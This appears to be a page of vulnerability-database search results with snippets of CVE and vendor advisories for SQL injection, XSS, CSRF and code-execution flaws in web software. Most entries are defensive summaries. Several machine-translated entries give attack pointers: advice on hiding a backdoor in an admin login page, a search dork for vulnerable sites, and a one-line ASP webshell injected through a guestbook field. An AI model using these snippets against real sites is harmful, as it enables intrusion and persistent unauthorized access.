9678 matches found
CVE-2010-4944
SQL injection vulnerability in the Elite Experts comeliteexperts component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a showExpertProfileDetailed action to index.php...
iVIEW Suite vulnerable to SQL injection
Overview: iVIEW Suite from RADVISION contains a SQL injection vulnerability. iVIEW Suite provided by RADVISION is software to manage video conference systems in SCOPIA. iVIEW Suite contains a SQL injection vulnerability. Hirofumi Oka of NRI SecureTechnologies, Ltd. reported this vulnerability to...
Fire article back office management system V2.1 0day-vulnerability warning-the black bar safety net
Fire article the background management system uses the secondary classification, the interface simple and generous, features simple and easy to use, can be remote automatically upload pictures Delete the article, article related images also be deleted to reduce junk files exist. First open the...
Movable Type vulnerable to SQL injection
Overview: Movable Type contains a SQL injection vulnerability. Movable Type, a web log system from Six Apart KK, contains a SQL injection vulnerability. Impact: A remote attacker may view or modify information stored by the product. Solution: Update the Software. Update to the latest version according ...
phpwind pw_ajax.php and class_other.php remote code execution vulnerability
A serious vulnerability exists in newer versions of the phpwind forum; successful exploitation allows remote execution of arbitrary PHP code. In pw_ajax.php: elseif $action == 'pcdelimg' InitGParray'fieldname','pctype'; InitGParray'tid','id',2; if !$tid || !$id || !$fieldname || !$pctype echo 'fail'; $id = int$id; if $pctype == 'topic' $tablename = GetTopcitable$id; elseif $pctype == 'postcate'...
PT-2010-4397 · Joomla · Ttvideo
Name of the Vulnerable Software and Affected Versions: TTVideo com ttvideo component version 1.0 for Joomla! Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved by exploiting the cid parameter in a 'video' action to 'index.php'. Recommendations: For...
CVE-2010-1949
SQL injection vulnerability in the Online News Paper Manager comjnewspaper component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the cid parameter to index.php. NOTE: some of these details are obtained from third party information...
MODx vulnerable to SQL injection
Overview: MODx provided by The MODx CMS Project contains a SQL injection vulnerability. MODx provided by the MODx CMS Project is a Contents Management System (CMS) software. MODx contains a SQL injection vulnerability. Takeshi Terada of Mitsui Bussan Secure Directions, Inc. reported this vulnerabili...
HL-SiteManager vulnerable to SQL injection
Overview: HL-SiteManager from Heartlogic contains a SQL injection vulnerability. HL-SiteManager from Heartlogic is a contents management system (CMS) software. HL-SiteManager contains a SQL injection vulnerability. Yuji Tounai of bogus.jp reported this vulnerability to IPA. JPCERT/CC coordinated wit...
PT-2010-2125 · Typo3 · Vote For Tt News
Name of the Vulnerable Software and Affected Versions: TYPO3 extension 'vote for tt news' version 1.0.1 and earlier Description: The issue allows remote attackers to execute arbitrary SQL commands. Recommendations: For TYPO3 extension 'vote for tt news' version 1.0.1 and earlier, update to a...
UBUNTU-CVE-2009-3582
Multiple SQL injection vulnerabilities in the delete subroutine in SQL-Ledger 2.8.24 allow remote authenticated users to execute arbitrary SQL commands via the (1) id and possibly (2) db parameters in a Delete action to the output of a VendorsReportsSearch search operation...
the web leaving the back door-vulnerability warning-the black bar safety net
First: In the administrator backend login screen to hide our Backdoor, it is relatively safe Because the administrator of the inlet is not often traded, as long as his login screen on our back door just in! Of course, you also can be flexibly inserted into the other file, as long as this file is...
New new cloud-0DAY releases-vulnerability warning-the black bar safety net
Reproduced indicate from: www.hacktc.com Keywords:inurl:/soft/show. asp? id= See what others throw out, and I also do not hide, throw out everyone playing. Vulnerability is simply to plug sentence to ASK the database, register. asp Direct access to ask, and then register the user, the password...
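段富超 (dfc) v1.0 Music Entertainment Site addgbook.asp remote webshell write vulnerability
段富超 dfc v1.0 Music Entertainment Site combines Flash animation, an article system, online video, a guestbook, online song requests, personality quizzes and other features (the video section can directly embed videos from sites such as Youku and Tudou), and is well suited to the personal websites of Flash animation authors and enthusiasts and of short-video authors and enthusiasts. The guestbook does not filter input strictly, so a backdoor can be inserted directly into the database. dfc1.0/addgbook.asp Writing the one-line code %executerequest"cmd"% into the guestbook's "Your homepage" field causes the message to be written to date/dfc.asp; connecting to it yields a shell http://127.0.0.1/dfc1.0/date/dfc.asp dfc v1.0 None available. Users are advised to apply strict filtering...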
CVE-2009-2048
Cross-site scripting (XSS) vulnerability in the Administration interface in Cisco Customer Response Solutions (CRS) before 7.01 SR2 in Cisco Unified Contact Center Express (aka CCX) server allows remote authenticated users to inject arbitrary web script or HTML into the CCX database via unspecified...
CVE-2007-6727
SQL injection vulnerability in topic.php in KerviNet Forum 1.1 allows remote attackers to execute arbitrary SQL commands via the forum parameter...
CVE-2009-2154
SQL injection vulnerability in admin/login.php in Impleo Music Collection 2.0, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter...
PT-2009-1550 · Bahar · Bahar Download Script
Name of the Vulnerable Software and Affected Versions: Bahar Download Script version 2.0 Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved via the kid parameter in the aspkat.asp file. Recommendations: For Bahar Download Script version 2.0, conside...
DEBIAN-CVE-2008-5621
Cross-site request forgery (CSRF) vulnerability in phpMyAdmin 2.11.x before 2.11.9.4 and 3.x before 3.1.1.0 allows remote attackers to perform unauthorized actions as the administrator via a link or IMG tag to tbl_structure.php with a modified table parameter. NOTE: other unspecified pages are also...